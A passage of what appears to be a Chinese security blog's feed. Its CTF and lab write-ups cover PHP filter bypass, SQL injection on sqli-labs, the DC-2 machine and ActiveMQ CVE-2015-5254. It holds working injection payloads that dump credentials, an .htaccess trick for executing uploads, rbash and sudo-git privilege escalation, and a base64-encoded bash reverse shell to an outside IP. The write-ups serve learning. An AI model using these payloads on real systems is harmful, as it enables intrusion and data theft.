class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><code class="hljs php"><span class="hljs-meta"><?php</span><br><span class="hljs-variable">$a</span> = <span class="hljs-string">"system"</span>;<br><span class="hljs-variable">$b</span> = <span class="hljs-string">"ls /"</span>;<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-variable">$a</span>); <span class="hljs-comment">// 使用 ~$a,按位取反操作</span><br><span class="hljs-keyword">print</span>(<span class="hljs-string">"\n"</span>);<br><span class="hljs-keyword">echo</span> <span class="hljs-title function_ invoke__">urlencode</span>(~<span class="hljs-variable">$b</span>); <span class="hljs-comment">// 使用 ~$b,按位取反操作</span><br><span class="hljs-meta">?></span><br>payload=?wllm=(~%<span class="hljs-number">8</span>c%<span class="hljs-number">86</span>%<span class="hljs-number">8</span>c%<span class="hljs-number">8</span>b%<span class="hljs-number">9</span>a%<span class="hljs-number">92</span>)(~%<span class="hljs-number">9</span>C%<span class="hljs-number">9</span>E%<span class="hljs-number">8</span>B%DF%D0%<span class="hljs-number">99</span>%D5);<br></code></pre></td></tr></table></figure><h2 id="htaccess文件包含绕过"><a href="#htaccess文件包含绕过" class="headerlink" title=".htaccess文件包含绕过"></a>.htaccess文件包含绕过</h2><figure class="highlight js"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><code class="hljs js"><span class="hljs-comment">//仅匹配1.jpg,也可以适用全部文件,解析为php</span><br><<span class="hljs-title class_">FilesMatch</span> <span class="hljs-string">"1.jpg"</span>><br><span class="hljs-title class_">SetHandler</span> application/x-httpd-php<br></<span class="hljs-title class_">FilesMatch</span>><br></code></pre></td></tr></table></figure>]]></content>
<categories>
<category>网络</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>web中可执行的xml文件jelly</title>
<link href="/2024/12/11/web%E4%B8%AD%E5%8F%AF%E6%89%A7%E8%A1%8C%E7%9A%84xml%E6%96%87%E4%BB%B6jelly/"/>
<url>/2024/12/11/web%E4%B8%AD%E5%8F%AF%E6%89%A7%E8%A1%8C%E7%9A%84xml%E6%96%87%E4%BB%B6jelly/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="简介"></a>简介</h1><p>好久没有写东西了,最近的ctf中有遇到一个jelly的题目,记录一下,题目是国成杯的web题,题目描述如下:</p><h2 id="Jelly简介"><a href="#Jelly简介" class="headerlink" title="Jelly简介"></a>Jelly简介</h2><p><a href="https://commons.apache.org/proper/commons-jelly/">Jelly的官方介绍</a></p><p>Jelly是Java Server Pages XML的简称,它是一种基于XML的脚本语言,用于在Java EE应用程序中生成动态内容。Jelly是一种基于XML的脚本语言,它允许开发人员使用XML标记来编写Java代码,从而实现动态内容的生成。</p><p>Jelly脚本通常包含在JSP文件中,通过在JSP文件中使用特殊的XML标记来执行Java代码。这些标记被称为Jelly标签,它们可以用于执行Java代码、访问Java对象、处理请求和响应等操作。</p><h2 id="如何实现并工作的"><a href="#如何实现并工作的" class="headerlink" title="如何实现并工作的"></a>如何实现并工作的</h2><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag"><<span class="hljs-name">document</span> <span class="hljs-attr">time</span>=<span class="hljs-string">"${now}"</span>></span><br> Welcome ${user.name} to Jelly!<br><span class="hljs-tag"></<span class="hljs-name">document</span>></span><br></code></pre></td></tr></table></figure><p>原本有的脚本</p><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br></pre></td><td class="code"><pre><code class="hljs java"><span class="hljs-keyword">public</span> <span class="hljs-keyword">class</span> <span class="hljs-title class_">MyTask</span> {<br><br> <span class="hljs-comment">// 'doIt' method that does some function/task...</span><br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">run</span><span class="hljs-params">()</span> <span class="hljs-keyword">throws</span> SomeException {<br> <span class="hljs-comment">// do something...</span><br> }<br><br> <span class="hljs-comment">// Properties, can be any type</span><br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">setX</span><span class="hljs-params">(<span class="hljs-type">int</span> x)</span> {<br> <span class="hljs-built_in">this</span>.x = x;<br> }<br> <span class="hljs-keyword">public</span> <span class="hljs-keyword">void</span> <span class="hljs-title function_">setY</span><span class="hljs-params">(String y)</span> {<br> <span class="hljs-built_in">this</span>.y = y;<br> }<br>}<br></code></pre></td></tr></table></figure><p>调用脚本的jelly文件</p><figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><code class="hljs xml"><span class="hljs-tag"><<span class="hljs-name">j:jelly</span> <span class="hljs-attr">xmlns:j</span>=<span class="hljs-string">"jelly:core"</span> <span class="hljs-attr">xmlns:define</span>=<span class="hljs-string">"jelly:define"</span> <span class="hljs-attr">xmlns:my</span>=<span class="hljs-string">"myTagLib"</span>></span><br><br> <span class="hljs-tag"><<span class="hljs-name">define:taglib</span> <span class="hljs-attr">uri</span>=<span class="hljs-string">"myTagLib"</span>></span><br> <span class="hljs-tag"><<span class="hljs-name">define:jellybean</span> <span class="hljs-attr">name</span>=<span class="hljs-string">"foo"</span> <span class="hljs-attr">className</span>=<span class="hljs-string">"MyTask"</span>/></span><br> <span class="hljs-tag"></<span class="hljs-name">define:taglib</span>></span><br><br> Now lets use the new tag<br> <br> <span class="hljs-tag"><<span class="hljs-name">my:foo</span> <span class="hljs-attr">x</span>=<span class="hljs-string">"2"</span> <span class="hljs-attr">y</span>=<span class="hljs-string">"cheese"</span>/></span><br><br><span class="hljs-tag"></<span class="hljs-name">j:jelly</span>></span><br></code></pre></td></tr></table></figure><h2 id="继承功能"><a href="#继承功能" class="headerlink" title="继承功能"></a>继承功能</h2><p>jelly继承了JSTL,Ant,XML和Web_Service等,可以执行很多功能</p>]]></content>
<categories>
<category>网络</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>sqli10-20</title>
<link href="/2024/12/09/sqli10-20/"/>
<url>/2024/12/09/sqli10-20/</url>
<content type="html"><![CDATA[<h1 id="sqli11-20"><a href="#sqli11-20" class="headerlink" title="sqli11-20"></a>sqli11-20</h1><h2 id="11"><a href="#11" class="headerlink" title="11"></a>11</h2><p>输入1’出现报错显示,存在注入<br><img src="https://gitee.com/fogpost/photo/raw/master/202412091947957.png" srcset="/img/loading.gif" lazyload><br>构造1’ or 1=1 #成功,1’union select 1,2#成功注入,同sqli1<br><img src="https://gitee.com/fogpost/photo/raw/master/202412091949999.png" srcset="/img/loading.gif" lazyload></p><h2 id="12"><a href="#12" class="headerlink" title="12"></a>12</h2><p>为字符注入带引号,payload如下</p><blockquote><p>1”) or 1=1<br>1”) union select 1,2#</p></blockquote><h2 id="13-14"><a href="#13-14" class="headerlink" title="13,14"></a>13,14</h2><p>同上,引号和括号的区别</p><h2 id="15"><a href="#15" class="headerlink" title="15"></a>15</h2><p>同11bool盲注</p><h2 id="16"><a href="#16" class="headerlink" title="16"></a>16</h2><p>同12bool盲注</p><h2 id="17"><a href="#17" class="headerlink" title="17"></a>17</h2><p>重点 三种报错注入<br>extractvalue()报错注入,updatexml()报错注入和group by()报错注入<br>原理</p>]]></content>
<categories>
<category>SQL</category>
</categories>
<tags>
<tag>sql</tag>
</tags>
</entry>
<entry>
<title>DC-2</title>
<link href="/2024/11/28/DC-2/"/>
<url>/2024/11/28/DC-2/</url>
<content type="html"><![CDATA[<h1 id="DC-2"><a href="#DC-2" class="headerlink" title="DC-2"></a>DC-2</h1><p>今天无所事事,又来搞靶机了,少搞这个,打算搞完DC系列再去加深学习一下,该学习学习eviden师傅的fofa教程了</p><p>本机ip : 192.168.56.135<br>目标ip : 192.168.56.147</p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>信息收集</h2><p>nmap扫描本地ip,主机发现 -sP,是用于内网主机探测</p><blockquote><p>nmap -sP 192.168.56.135/24<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282257172.png" srcset="/img/loading.gif" lazyload><br>端口扫描<br>nmap -A -p- 192.168.56.147<br>对靶机ip的全端口详细扫描,发现两个应用分别是80和7744端口,http和ssh<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282301709.png" srcset="/img/loading.gif" lazyload></p></blockquote><h2 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>渗透测试</h2><h3 id="修改hosts"><a href="#修改hosts" class="headerlink" title="修改hosts"></a>修改hosts</h3><p>访问对应的web站点,发现了域名跳转,需要我们更改hosts文件,将域名指向靶机ip<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282305798.png" srcset="/img/loading.gif" lazyload></p><blockquote><p>vim /etc/hosts<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282308689.png" srcset="/img/loading.gif" lazyload><br>再次访问,进入主页面,发现flag,让我们爆破账户<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282309300.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282311344.png" srcset="/img/loading.gif" lazyload></p></blockquote><h3 id="wpscan爆破账户"><a href="#wpscan爆破账户" class="headerlink" title="wpscan爆破账户"></a>wpscan爆破账户</h3><p>登录网站后进行指纹识别,可以用whatweb或者wapper<br>,发现是由wordpress搭建的</p><blockquote><p>whatweb 192.168.56.147<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282312143.png" srcset="/img/loading.gif" lazyload><br>进行目录扫描,查找管理员页面,发现后台管理页面<br>dirb <a href="http://dc-2/">http://dc-2/</a><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282314018.png" srcset="/img/loading.gif" lazyload><br>似乎有个专门的wordpress工具wpscan,使用wpscan进行扫描,常用语句:<br>wpscan –url <a href="http://dc-2/">http://dc-2</a> 扫描版本<br>wpscan –url <a href="http://dc-2/">http://dc-2</a> –enumerate t 扫描主题<br>wpscan –url <a href="http://dc-2/">http://dc-2</a> –enumerate p 扫描插件<br>wpscan –url <a href="http://dc-2/">http://dc-2</a> –enumerate u 枚举用户 </p></blockquote><p>扫描版本发现版本为4.7.10,并利用wpscan枚举用户<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282322816.png" srcset="/img/loading.gif" lazyload><br>发现三个用户admin,jerry,tom<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282324996.png" srcset="/img/loading.gif" lazyload><br>根据flag1用cewl来生成字典,并进行爆破</p><blockquote><p>cewl <a href="http://dc-2/">http://dc-2/</a> > 1.txt 生成字典<br> Cewl(Custom Word List Generator)是一个用 Ruby 编写的应用程序,它可以爬取指定 URL 的内容,并根据用户设定的参数和选项,生成自定义的字典文件。这些字典文件可以用于密码猜测、暴力破解等攻击场景,从而提高渗透测试的成功率</p></blockquote><blockquote><p>wpscan –url <a href="http://dc-2/">http://dc-2</a> –passwords 1.txt 爆破密码,发现jerry和tom的密码 </p></blockquote><p>jerry/adipiscing<br>tom/parturient </p><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282328174.png" srcset="/img/loading.gif" lazyload></p><p>尝试用jerry登录,发现flag2,并提示我们使用ssh登录<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282330516.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282330233.png" srcset="/img/loading.gif" lazyload></p><h3 id="ssh登录"><a href="#ssh登录" class="headerlink" title="ssh登录"></a>ssh登录</h3><blockquote><p>ssh <a href="mailto:tom@192.168.56.147">tom@192.168.56.147</a> -p 7744<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282333534.png" srcset="/img/loading.gif" lazyload><br>成功登录,发现在本地有flag3,但是只有vi可用,这个叫我们提权<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282335807.png" srcset="/img/loading.gif" lazyload></p></blockquote><h3 id="rbash提权"><a href="#rbash提权" class="headerlink" title="rbash提权"></a>rbash提权</h3><p>查看当前权限的软件</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282337342.png" srcset="/img/loading.gif" lazyload></p><p>利用echo来绕过rbash</p><blockquote><p>拿到jerry用户权限<br>export -p //查看环境变量<br>BASH_CMDS[a]=/bin/sh;a //把/bin/sh给a<br>/bin/bash<br>export PATH=$PATH:/bin/ //添加环境变量<br>export PATH=$PATH:/usr/bin //添加环境变量</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282345295.png" srcset="/img/loading.gif" lazyload></p><p>查看可以使用root权限的命令</p><blockquote><p>find / -user root -perm -4000 -print 2>/dev/null</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282354377.png" srcset="/img/loading.gif" lazyload></p><blockquote><p>su jerry 利用su获取jerry的权限,这时密码就可以用了<br>现在就可以越权查看jerry的falg4,提示我们用git提权</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282341436.png" srcset="/img/loading.gif" lazyload></p><blockquote><p>sudo -l 发现可以用git软件</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282351395.png" srcset="/img/loading.gif" lazyload></p><blockquote><p>sudo git help status </p></blockquote><p>查看git的命令,在配置页面的命令行输入<br>!/bin/sh,即可提权<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282357480.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282359962.png" srcset="/img/loading.gif" lazyload></p><p>##总结<br>至此已经完成,知识点有比如wpscan的用法,git的提权,rbash的绕过</p>]]></content>
<categories>
<category>渗透测试</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>CVE-2015-5254</title>
<link href="/2024/11/27/CVE-2015-5254/"/>
<url>/2024/11/27/CVE-2015-5254/</url>
<content type="html"><![CDATA[<h1 id="CVE-2015-5254"><a href="#CVE-2015-5254" class="headerlink" title="CVE-2015-5254"></a>CVE-2015-5254</h1><p>第一次写这个,玩一玩这个CVE,从老的开始学这个,这是一个反序列化漏洞<br>账户和密码默认admin/admin</p><h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>漏洞描述</h2><p>漏洞编号:CVE-2015-5254<br>影响版本:Apache ActiveMQ 5.13.0之前5.x版本,<a href="https://www.cvedetails.com/cve/CVE-2015-5254/">https://www.cvedetails.com/cve/CVE-2015-5254/</a><br>漏洞产生原因:该漏洞源于程序没有限制可在代理中序列化的类。远程攻击者可借助特制的序列化的Java Message Service(JMS)ObjectMessage对象利用该漏洞执行任意代码。</p><p>vulnP:110.41.22.24:8186<br>这是我自己的服务器,现在这个端口应该关了,我用完就关的,想玩的可以和我说哈,我给你开,就是个docker容器,打烂了都没用<br>hackIP:172.20.205.57</p><h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><p>这个漏洞具体是两个端口61616工作端口,消息传递,8161是管理页面</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271814424.png" srcset="/img/loading.gif" lazyload><br>直接访问页面,发现是一个Apache ActiveMQ的CMS框架,由于是漏洞复现,我们能很清楚的知道它的版本。如果不知道版本可通过乱输入路径进行报错,或是使用云悉指纹识别进行版本检测.</p><blockquote><p>whatweb <a href="http://110.41.22.24:8161/">http://110.41.22.24:8161/</a> 可以查看版本</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271821474.png" srcset="/img/loading.gif" lazyload><br><a href="https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar">jmet</a></p><blockquote><p>java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “touch /tmp/success” -Yp ROME 110.41.22.24 61616<br>注意java版本要8及以下</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271853828.png" srcset="/img/loading.gif" lazyload><br>我们实现在管理员界面引入一个event队列,查看这个消息<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271859064.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411271900112.png" srcset="/img/loading.gif" lazyload><br>点击任意一条消息触发,发现已经执行了命令,touch /tmp/success<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271907776.png" srcset="/img/loading.gif" lazyload> </p><blockquote><p>java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y “bash -c {echo,YmFzaCAtaT4vZGV2L3RjcC8xOTIuMTY4LjE4LjI0NC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}” -Yp ROME 110.41.22.24 61616</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271911825.png" srcset="/img/loading.gif" lazyload></p><p>在执行完这个时候管理员处会获得新的消息,这时点击便会反弹我们的shell<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271909000.png" srcset="/img/loading.gif" lazyload><br>发现个事情,nc只能监听本地的接口,这个反弹shell有点问题由于我不是很会处理这个ip的转换,所以可能会有点问题,反弹shell也有点问题,看之后能不能在本地内网再来一次</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>这个CVE需要诱导管理员点击的同时,还需要再内网中攻击可以说是比较拉跨了,但是攻击方式又相对简单,很容易复现,虽然难点再exp的编写上,什么时候要看看这个jar包的内容</p>]]></content>
<categories>
<category>CVE</category>
</categories>
<tags>
<tag>target</tag>
</tags>
</entry>
<entry>
<title>web杂项</title>
<link href="/2024/11/27/web%E6%9D%82%E9%A1%B9/"/>
<url>/2024/11/27/web%E6%9D%82%E9%A1%B9/</url>
<content type="html"><![CDATA[<h1 id="搜索技巧"><a href="#搜索技巧" class="headerlink" title="搜索技巧"></a>搜索技巧</h1><ul><li>site:<a href="http://www.hao123/">www.hao123</a>. <ul><li>返回此目标站点被搜索引擎抓取收录的所有内容<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271724499.png" srcset="/img/loading.gif" lazyload></li></ul></li><li>site:<a href="http://www.hao123.com/">www.hao123.com</a> keyword<ul><li>返回此目标站点被搜索引擎抓取收录的包含此关键词的所有页面</li><li>此处可以将关键词设定为网站后台,管理后台,密码修改,密码找回等</li></ul></li><li>site:<a href="http://www.hao123.com/">www.hao123.com</a> inurl:admin.php<ul><li>返回目标站点的地址中包含admi<br> n.php的所有页面,可以使用admin.php/manage.php或者其他关键词来寻找关键功能页面</li></ul></li><li>link:<a href="http://www.hao123.com/">www.hao123.com</a><ul><li>返回所有包含目标站点链接的页面,其中包括其开发人员的个人博客,开发日志,或者开放这个站点的第三方公司,合作伙伴等</li></ul></li><li>related:<a href="http://www.hao123.com/">www.hao123.com</a><ul><li>返回所有与目标站点”相似”的页面,可能会包含一些通用程序的信息等</li></ul></li><li>intitle:”500 Internal Server Error” “server at”<ul><li>搜索出错的页面</li></ul></li><li>inurl:”nph-proxy.cgi” “Start browsing”<ul><li>搜索代理服务器</li></ul></li></ul>]]></content>
<categories>
<category>网络</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>sqli1-10练习</title>
<link href="/2024/11/24/sqli%E7%BB%83%E4%B9%A0/"/>
<url>/2024/11/24/sqli%E7%BB%83%E4%B9%A0/</url>
<content type="html"><![CDATA[<h1 id="sqli开头简介"><a href="#sqli开头简介" class="headerlink" title="sqli开头简介"></a>sqli开头简介</h1><p>sql注入我们可以理解为,通过构造恶意的输入,从而让程序执行我们想要执行的代码。所以我们需要了解源代码中的sql注入是什么样的语句什么样的过滤,但是在黑盒中我们无法了解代码,这便需要我们去有足够的知识积累,所以我打算将这个靶场打完,我要做sql领域大神🥰!</p><h1 id="前置知识点"><a href="#前置知识点" class="headerlink" title="前置知识点"></a>前置知识点</h1><p>联合查询特点:<br>1、要求多条查询语句的查询列数是一致的!<br>2、要求多条查询语句的查询的每一列的类型和顺序最好一致<br>3、union关键字默认去重,如果使用union all 可以包含重复项 </p><p>version():查看数据库版本<br>database():查看使用的数据库<br>user():查看当前用户<br>limit:limit子句分批来获取所有数据<br>group_concat():一次性获取所有的数据库信息</p><p>information_schema.tables:包含了数据库里所有的表<br>table_name:表名<br>table_schema:数据库名<br>column_name:字段名</p><p>–dbs:是查看所有的数据库<br>–tables:是查看所有的表<br>–columns:是查看表中所有的字段名<br>–dump:是查询哪个表的数据</p><h1 id="联合注入"><a href="#联合注入" class="headerlink" title="联合注入"></a>联合注入</h1><h2 id="手工注入"><a href="#手工注入" class="headerlink" title="手工注入"></a>手工注入</h2><ol><li>首先我们输入1,发现返回正常输入?id=1’,返回错误,说明存在单引号注入<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060247359.png" srcset="/img/loading.gif" lazyload></li><li>输入?id=1’ and ‘1’=’1,页面回显正常<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060248949.png" srcset="/img/loading.gif" lazyload></li><li>构造?id=1’ and ‘1’=’1’ order by 1–+ 页面回显正常<br>?id=1’ and ‘1’=’1’ order by 2–+ 页面回显正常<br>?id=1’ and ‘1’=’1’ order by 3–+ 页面回显正常<br>?id=1’ and ‘1’=’1’ order by 4–+ 出现报错界面<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060250107.png" srcset="/img/loading.gif" lazyload><br>所以我们了解到了数据库表只有三列,确定了字段数</li><li>构造联合查询?id=-1’ union select 1,2,3–+前面的id为-1,使前面的语句无效,用union查询是否有回显,发现2和3有回显<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060254643.png" srcset="/img/loading.gif" lazyload></li><li>构造?id=-1’ union select 1,database(),version()–+发现回显了数据库名称和版本信息<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060256922.png" srcset="/img/loading.gif" lazyload></li><li>构造?id=-1’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()–+发现回显了数据库中的表名<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060259924.png" srcset="/img/loading.gif" lazyload></li><li>查询users的字段名?id=-1’ union select 1,2,group_concat(column_name)from information_schema.columns where table_name=’users’–+<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060302469.png" srcset="/img/loading.gif" lazyload></li><li>查询users表中的内容-1’ union select 1,2,group_concat(0x5c,username,0x5c,password) from users –+ 0x5c是反斜杠的十六进制,用于连接这两个库的数据内容<br>这个是手工注入的基本,大部分的注入都是围绕上面来优化的</li></ol><h2 id="sqlmap注入"><a href="#sqlmap注入" class="headerlink" title="sqlmap注入"></a>sqlmap注入</h2><p>sqlmap -u <a href="http://sql/sqli-labs-master/Less-1/id=1">http://sql/sqli-labs-master/Less-1/id=1</a> –dbs 查看对应的库<br>之后还会专门出一个sqlmap的教程,这里就不多说了</p><h1 id="bool盲注"><a href="#bool盲注" class="headerlink" title="bool盲注"></a>bool盲注</h1><p>?id=1’and length((select database()))>9–+<br>#大于号可以换成小于号或者等于号,主要是判断数据库的长度。lenfth()是获取当前数据库名的长度。如果数据库是haha那么length()就是4<br>?id=1’and ascii(substr((select database()),1,1))=115–+<br>#substr(“78909”,1,1)=7 substr(a,b,c)a是要截取的字符串,b是截取的位置,c是截取的长度。布尔盲注我们都是长度为1因为我们要一个个判断字符。ascii()是将截取的字符转换成对应的ascii吗,这样我们可以很好确定数字根据数字找到对应的字符。</p><p>?id=1’and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13–+<br>判断所有表名字符长度。<br>?id=1’and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99–+<br>逐一判断表名</p><p>?id=1’and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’))>20–+<br>判断所有字段名的长度<br>?id=1’and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’),1,1))>99–+<br>逐一判断字段名。</p><p>?id=1’ and length((select group_concat(username,password) from users))>109–+<br>判断字段内容长度<br>?id=1’ and ascii(substr((select group_concat(username,password) from users),1,1))>50–+<br>逐一检测内容。</p><h2 id="双查询注入"><a href="#双查询注入" class="headerlink" title="双查询注入"></a>双查询注入</h2><p><a href="https://blog.csdn.net/xiayun1995/article/details/86512290">参考文献</a><br>在了解了bool盲注的基本原理之后我们发现一个问题,手工注入必然会导致时间过程,于是应运而生,我们的双查询注入可以帮助我们避免长时间的枯燥操作直接获取数据库的信息,在讲解之前我们要先了解几个函数</p><h3 id="函数"><a href="#函数" class="headerlink" title="函数"></a>函数</h3><p>rand():随机数函数 返回一个0到1的数<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241656811.png" srcset="/img/loading.gif" lazyload><br>floor():向下取整,floor的向下取整可以帮我们进行去整处理,加入乘法便可以构建任意随机数选择<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241658373.png" srcset="/img/loading.gif" lazyload><br>concat():字符串连接函数,用于连接我们查询到的数据<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241701358.png" srcset="/img/loading.gif" lazyload><br>group by:分组 as (_<em>别名):给查询结果起别名(括号中为自定义的别名)<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241707695.png" srcset="/img/loading.gif" lazyload><br>count():聚合函数<br>这里利用count(</em>)对前面的返回数据进行统计,由于group by 和随机数的原因,有可能会出现重复的键值,当键值重复时就会触发错误,然后报错,由于子查询在错误发生之前就已经完成,所以子查询的内容会随着报错信息一起显示出来<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241709101.png" srcset="/img/loading.gif" lazyload><br>我们这里需要的是第一次的报错,因为在实际过程中我们不可能查询到正确消息,只有在可能遇到错误时才会有返回值</p><h3 id="子查询"><a href="#子查询" class="headerlink" title="子查询"></a>子查询</h3><p>子查询:内部查询,允许把另一个查询嵌套到当前的查询中</p><blockquote><p>MariaDB [dvwa]> SELECT concat(“test: “,(select database())) as a;<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241654803.png" srcset="/img/loading.gif" lazyload><br>操作开始便会先查询(select database()),然后将查询结果与”test: “连接起来,最后返回结果。</p></blockquote><p>在注入的过程中我们不了解库名库表,可以借用information_schema的库来猜测,其中information_schema.schemata中包含了mysql的所有库名,information_schema.tables中包含了所有的表名,information_schema.columns中包含了所有的列名<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241703198.png" srcset="/img/loading.gif" lazyload></p><h3 id="报错注入模板"><a href="#报错注入模板" class="headerlink" title="报错注入模板"></a>报错注入模板</h3><ul><li>select 1/0</li><li>select 1 from (select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a</li><li>extractvalue(1, concat(0x5c,(select user())))</li><li>updatexml(0x3a,concat(1,(select user())),1)</li><li>exp(~(SELECT * from(select user())a))</li><li>ST_LatFromGeoHash((select * from(select * from(select user())a)b))</li><li>GTID_SUBSET(version(), 1)</li></ul><h1 id="时间盲注"><a href="#时间盲注" class="headerlink" title="时间盲注"></a>时间盲注</h1><p>?id=1’ and if(1=1,sleep(5),1)–+<br>判断参数构造。<br>?id=1’and if(length((select database()))>9,sleep(5),1)–+<br>判断数据库名长度</p><p>?id=1’and if(ascii(substr((select database()),1,1))=115,sleep(5),1)–+<br>逐一判断数据库字符<br>?id=1’and if(length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13,sleep(5),1)–+<br>判断所有表名长度</p><p>?id=1’and if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99,sleep(5),1)–+<br>逐一判断表名<br>?id=1’and if(length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’))>20,sleep(5),1)–+<br>判断所有字段名的长度</p><p>?id=1’and if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=’users’),1,1))>99,sleep(5),1)–+<br>逐一判断字段名。<br>?id=1’ and if(length((select group_concat(username,password) from users))>109,sleep(5),1)–+<br>判断字段内容长度</p><p>?id=1’ and if(ascii(substr((select group_concat(username,password) from users),1,1))>50,sleep(5),1)–+<br>逐一检测内容。</p><h1 id="通过sql来getshell"><a href="#通过sql来getshell" class="headerlink" title="通过sql来getshell"></a>通过sql来getshell</h1><h2 id="条件和原理"><a href="#条件和原理" class="headerlink" title="条件和原理"></a>条件和原理</h2><blockquote><p>条件:<br> root权限<br> 知道网站根目录绝对路径<br> secure_file_priv为空或指定目录(@@secure_file_priv参数可以其值)<br> gpc关闭<br>原理:<br> 写入webshell,通过参数执行系统命令,结束后删除webshell<br>附:sqlserver getshell条件和原理<br> 条件:<br> 支持外连<br> 有sa权限<br> 原理:<br> 开启xp_cmd扩展执行系统命令 </p></blockquote><h2 id="读写文件"><a href="#读写文件" class="headerlink" title="读写文件"></a>读写文件</h2><blockquote><p>?id=-1)))))) union select 